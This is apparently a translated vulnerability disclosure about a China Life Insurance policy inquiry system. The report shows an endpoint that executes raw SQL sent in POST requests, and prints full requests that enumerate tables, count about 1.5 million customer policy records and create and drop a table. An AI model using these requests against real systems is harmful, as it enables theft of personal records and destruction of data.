A System Defect in China Life can cause leakage of user records in the system
Design defects
China Life Insurance customer policy Inquiry System
**. **: 8443/cusQuery/indexlis. jsp
Baidu to a page **. **: 8443/cusQuery/customerlogon/CustomerActivateInput1.jsp
Query captured packets and you will get a post
POST **.**.**.**:8443/cusQuery/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: **.**.**.**:8443/cusQuery/customerlogon/CustomerActivateInput1.jspContent-Type: application/x-www-form-urlencodedUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: **.**.**.**:8443Content-Length: 31Connection: Keep-AliveCache-Control: no-cacheCookie: JSESSIONID=559940556C121AB229B8E58D26AA24AAselect sysdate from dual &1&0&0
See SQL
So we can construct it ourselves.
select TABLE_NAME,NUM_ROWS from tabs &1&0&0
POST **.**.**.**:8443/cusQuery/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: **.**.**.**:8443/cusQuery/customerlogon/CustomerActivateInput1.jspContent-Type: application/x-www-form-urlencodedUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: **.**.**.**:8443Content-Length: 35Connection: Keep-AliveCache-Control: no-cacheCookie: JSESSIONID=559940556C121AB229B8E58D26AA24AAselect count(*) from lccont &1&0&0
The lccont table contains 1579524 data records.
View the first 100
In fact, you can add, delete, and modify tables not only for queries.
Create a table named wooyun
Check whether the wooyun table exists.
Delete A wooyun table
Drop table wooyun
If the table cannot be found, the new table will not be added. If the whole database is maliciously deleted, it will be a tragedy.
Solution:
Patch.